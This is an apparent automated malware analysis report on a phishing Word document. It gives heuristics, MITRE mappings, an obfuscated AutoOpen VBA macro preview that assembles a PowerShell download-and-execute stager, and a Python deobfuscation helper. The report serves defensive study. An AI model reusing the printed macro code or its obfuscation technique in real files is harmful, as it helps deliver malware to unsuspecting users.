Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious OLE Word document carrying a VBA macro. The decisive finding is the Shell() call: it gives the document a way to run arbitrary commands on the host as soon as the macro executes. Execution is automatic through an AutoOpen entry point, and the compiled p-code stream also pairs an auto-execution token with shell/download/object-execution tokens, so the behaviour does not depend on readable source being recoverable. The extracted source (macros.bas) is heavily obfuscated: long runs of junk arithmetic on undefined variables, all kept from faulting by On Error Resume Next, are interleaved with Mid() calls that slice short fragments out of longer literals. Once the recurring tokens vte+vte, i2S+i2S and '+' (which appear to be filler) are ignored, the visible fragments read DownloadFile(, ToStr, new-object, System.Ne and eNv:COmsPec[4,15,25]-join. The last is a well-known PowerShell trick that indexes the characters I, e and x out of the COMSPEC path to spell iex (Invoke-Expression) without writing it, so the fragments are consistent with a PowerShell download-and-execute stager assembled at runtime. The full command and the download URL are not recoverable from the truncated preview and should not be inferred from it. The ClamAV name Img.Dropper.PhishingLure-6443153-0 agrees with this reading: a phishing lure whose job is to drop a second stage. One caveat on the heuristics: the OLE_LEGACY_WORDBASIC_AUTOEXEC description is canned text stating that no modern VBA project was recovered, but a VBA project was extracted from this sample, so treat that marker as corroboration of the AutoOpen finding rather than as a separate WordBasic-only execution path.
Heuristics (7)

- [critical] CLAMAV_DETECTION: ClamAV: Img.Dropper.PhishingLure-6443153-0
  ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- [medium] OLE_VBA_MACROS: VBA macros detected (3 related findings)
  Document contains VBA macro code
- [critical] OLE_VBA_SHELL: Shell() call in VBA
  Shell() call in VBA
- [high] OLE_VBA_AUTOOPEN: AutoOpen macro
  AutoOpen macro
- [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- [info] EMBEDDED_URL: Embedded URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML schema namespace, not an attacker-controlled address, and it is not evidence of network activity.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 79917 bytes | 3037242db1fae0a8f894a584b846c55486d09af864e69a55e69e9fec849c1a4c |
Preview: first 1,000 lines of the extracted script (macros.bas). olevba concatenates the recovered modules, so the listing opens with an empty ThisDocument module (attributes only) followed by the module XXbfpXqwBzvIz that holds the obfuscated code. The preview is truncated; the Shell() call flagged above lies outside the portion shown here.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "XXbfpXqwBzvIz"
Function tiYwHYBfwouWb()
On Error Resume Next
aQKOVIN = 871 / Rnd(4) + FRjZrVrTioYccj + pYnZWzNGOYD * 9 + Int(WNVsIoZ * CStr(pvjiPNLi)) + nhiVTsLCVZzrL * CDate(3624 - 352183467 * 84 / 475) / AoVVGJwPoC - CSng(620)
mSvjJowjMj = 871 / Rnd(4) + nWIBlDO + FWbcCJHFbMPkWc * 9 + Int(zwmViJLa * CStr(WkaiNFVwFhD)) + VMGfFWlEiJiL * CDate(3624 - 352183467 * 84 / 475) / KEwikpuv - CSng(620)
jfXEp = Mid("5WBwzjTqLcSAkk'+'vte+vteR7qOjjwwUnQC79sNu", 13, 12)
bIaaqL = 871 / Rnd(4) + qtsIJIojQbr + fDVJpnPcPi * 9 + Int(fqusFVsXsft * CStr(wTtMQIIutJT)) + RkzGcZaMMTMSO * CDate(3624 - 352183467 * 84 / 475) / jOXEwplaW - CSng(620)
wOrWEvapzdE = 871 / Rnd(4) + szcntQfnJKClhi + zhWYoWcMsQudCJ * 9 + Int(IfJNmmcW * CStr(TqqokKbKhzBCjo)) + YQkjXzndiCBWb * CDate(3624 - 352183467 * 84 / 475) / rGWKZFzjn - CSng(620)
cXavYiMRHA = 871 / Rnd(4) + wbwTHjhWXEaUV + vTEhQfGazzZu * 9 + Int(pKiErNIKAa * CStr(FclpvJqP)) + lIfkEKrkVdwuM * CDate(3624 - 352183467 * 84 / 475) / rMtAjGMb - CSng(620)
VCtmjth = Mid("LJQcUSwwZEY38aC4QtuNvte+vteuvte+vteas = vte+vteSvte+'+'vteu5envi2S+i2Ste+i2S+i2Svtevvte+vtei2S+i2S:vte+vtepublivte+vtec'+'vte+vt'+'e vte+vte+vte+v'+'te Uz9gKaUvte+v'+'tez9 vte+vte+ Su5i2S+i2Skaravzd5MkZO", 21, 175)
UvBorTtcz = 871 / Rnd(4) + ipkvCIFYrWp + CtzwfNLmjo * 9 + Int(rpsirKiprcIBhP * CStr(aWzciEdVEdKaZ)) + UAttpsFKdNOI * CDate(3624 - 352183467 * 84 / 475) / zutrRjnnppGJ - CSng(620)
bsdIYoaa = 871 / Rnd(4) + YjEvwXwrtNtl + RkACMbWzijE * 9 + Int(RZckwNTO * CStr(kHMjaasJzCIwv)) + UHdpsHktDAn * CDate(3624 - 352183467 * 84 / 475) / wVGwAaXohco - CSng(620)
obzYwiUXcfG = 871 / Rnd(4) + NUnAjjJFWcPHsW + PsjOVYfbKltr * 9 + Int(wfKnkuflWchi * CStr(abSikZNBXwGrnW)) + tdOnsXJrRcXz * CDate(3624 - 352183467 * 84 / 475) / BsQCkWzEIjBTi - CSng(620)
jubuKLiBT = Mid("sn8fjNnMEsya.cvti2S+i2Se+vteomvte+vte/vte+vteV8vte+'+'vte8bOR2RSfkaWwPstvzu", 11, 49)
jJnFLYci = 871 / Rnd(4) + lBiqfdvJVt + cTYbGCqD * 9 + Int(svbWCCBi * CStr(HzsTHDqduOZ)) + iJENidc * CDate(3624 - 352183467 * 84 / 475) / RlrYcdqZHnccNi - CSng(620)
LcVikLljkJ = 871 / Rnd(4) + PSrOKDHRVVsq + VPJOXsiuOW * 9 + Int(SCCkAuh * CStr(ZNGwNnoKvlH)) + AzWwSwF * CDate(3624 - 352183467 * 84 / 475) / JHlAvpwHBXQa - CSng(620)
XGoLwt = 871 / Rnd(4) + wPJLUkdIb + HOlXIYZZjJV * 9 + Int(TqiNQWG * CStr(zrwuIwURHOoc)) + uVOECwODC * CDate(3624 - 352183467 * 84 / 475) / ZtpvShHTGBq - CSng(620)
YEanokn = Mid("5d4J0tV7s6SAtcranc.Dvte+vteownlovte+vteadFii2S+i2Svte+vte'+'lvte+vtee(vte+vteSu5abc.vte+vteTovte+vteStvt'+'e+i2S+i2Svtervte+vESRYhnlw", 15, 111)
ThWLGJi = 871 / Rnd(4) + RRLPSvajhmJGT + SjGRCpw * 9 + Int(RbFBXrjJY * CStr(hPjiKhzCfz)) + VcucodbvFOl * CDate(3624 - 352183467 * 84 / 475) / zzjJRYjDYOoZD - CSng(620)
kAwXNrCLCa = 871 / Rnd(4) + hbiqYqoazu + GrtoqMUD * 9 + Int(NoVPYIqbBARQo * CStr(wFXCcshn)) + tcFwHYd * CDate(3624 - 352183467 * 84 / 475) / XbCGtGPSQAMY - CSng(620)
Akboj = 871 / Rnd(4) + kVYSAJwqv + LZjNEOSGvZkibX * 9 + Int(dwvDHnUYWtGW * CStr(NbrIDkwroVwJv)) + dihCtBjWNCno * CDate(3624 - 352183467 * 84 / 475) / qBMUwsit - CSng(620)
pvIcYdH = Mid("jevte+vte-Itevte+vtem(Si2S+iSik1LDEslo08PjSAV5su3l63MD", 2, 27)
NfztjV = 871 / Rnd(4) + cuRiziTJsKJaic + TJiDYPtplCDz * 9 + Int(kLsUOJQh * CStr(QKpKbiQtjKicw)) + SJAhjFjf * CDate(3624 - 352183467 * 84 / 475) / jKZhSoLZLEjtYO - CSng(620)
TwkTmV = 871 / Rnd(4) + HSpjQdi + vTaQrTOU * 9 + Int(cYmnwuF * CStr(mWICGAHrMYUn)) + LTORjFhq * CDate(3624 - 352183467 * 84 / 475) / vWzULdVOL - CSng(620)
zmOBkW = 871 / Rnd(4) + nPYsWtUfl + aLOchcH * 9 + Int(QFzCzwFUkSYS * CStr(tultUjnJA)) + fndscwzic * CDate(3624 - 352183467 * 84 / 475) / IHIPlRanBI - CSng(620)
EVWWJhuhiuC = Mid("IDff6 (('(('+'i2S . ( Q0reNv:COmsPec[4,15,25]-joinvtevte) ((vteSu5franv'+'te+vt'+'ec = new-obvte+vtejecvi2S+i2Ste+vtet vte+vteSystem.Nevte+i2S+JiW3zFO7i6Lrid20QmwsLt
... (truncated)
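The Mid() slicing and filler-token pattern in the preview is mechanical enough to script. The following Python is an added example written for this report, not code from the analysis platform or from oletools. It assumes two things the truncated preview does not confirm: that the fragments are concatenated in source order, and that the recurring tokens i2S+i2S, '+' and vte+vte are filler removed before execution. Its sample input is one junk line and three Mid() lines copied from the macros.bas preview above.

```python
"""Pull Mid()-sliced fragments out of obfuscated VBA and strip filler tokens.

Added example for this report, not code from the analysis platform or oletools.
Assumptions (inferred from the preview, not confirmed by it): fragments are
joined in source order, and the tokens i2S+i2S, '+' and vte+vte are filler.
"""
import re

# Mid("<literal>", start, length); VBA doubles a quote to escape it inside a literal.
MID_RE = re.compile(r'Mid\("((?:[^"]|"")*)"\s*,\s*(\d+)\s*,\s*(\d+)\s*\)', re.IGNORECASE)
# Every junk line in the preview follows one template: <name> = 871 / Rnd(4) + ...
JUNK_RE = re.compile(r'^\s*\w+\s*=\s*871\s*/\s*Rnd\(4\)')
# Assumed filler tokens, applied in this order (the order changes the result).
DEFAULT_FILLERS = ("i2S+i2S", "'+'", "vte+vte")


def vba_mid(s, start, length):
    """Emulate VBA Mid(): 1-based start; empty string once start is past the end."""
    if start < 1:
        raise ValueError("VBA Mid() start must be >= 1")
    return s[start - 1:start - 1 + length]


def extract_fragments(source):
    """Return every Mid() slice in source order, skipping the junk arithmetic lines."""
    fragments = []
    for line in source.splitlines():
        if JUNK_RE.match(line):
            continue
        for literal, start, length in MID_RE.findall(line):
            fragments.append(vba_mid(literal.replace('""', '"'), int(start), int(length)))
    return fragments


def strip_filler(text, fillers=DEFAULT_FILLERS):
    """Delete each assumed filler token in turn."""
    for token in fillers:
        text = text.replace(token, "")
    return text


def decode(source, fillers=DEFAULT_FILLERS):
    """First-pass reconstruction: join slices in source order, then strip filler."""
    return strip_filler("".join(extract_fragments(source)), fillers)


# Sample input: one junk line and three Mid() lines copied from the macros.bas preview.
SAMPLE_VBA = r'''
Function tiYwHYBfwouWb()
On Error Resume Next
aQKOVIN = 871 / Rnd(4) + FRjZrVrTioYccj + pYnZWzNGOYD * 9 + Int(WNVsIoZ * CStr(pvjiPNLi)) + nhiVTsLCVZzrL * CDate(3624 - 352183467 * 84 / 475) / AoVVGJwPoC - CSng(620)
jfXEp = Mid("5WBwzjTqLcSAkk'+'vte+vteR7qOjjwwUnQC79sNu", 13, 12)
jubuKLiBT = Mid("sn8fjNnMEsya.cvti2S+i2Se+vteomvte+vte/vte+vteV8vte+'+'vte8bOR2RSfkaWwPstvzu", 11, 49)
pvIcYdH = Mid("jevte+vte-Itevte+vtem(Si2S+iSik1LDEslo08PjSAV5su3l63MD", 2, 27)
'''

if __name__ == "__main__":
    for fragment in extract_fragments(SAMPLE_VBA):
        print(repr(fragment))
    print(decode(SAMPLE_VBA))
```

Run it against the full macros.bas rather than the preview to get the complete fragment list. On the three sample lines the filler guess already yields ".com/" and "-Item(" in the output, the kind of partial confirmation worth having before investing in a full reconstruction; if the guess is wrong, change DEFAULT_FILLERS, or skip static reconstruction and let the macro decode itself in an isolated Word VM with a breakpoint on Shell, reading the final argument there.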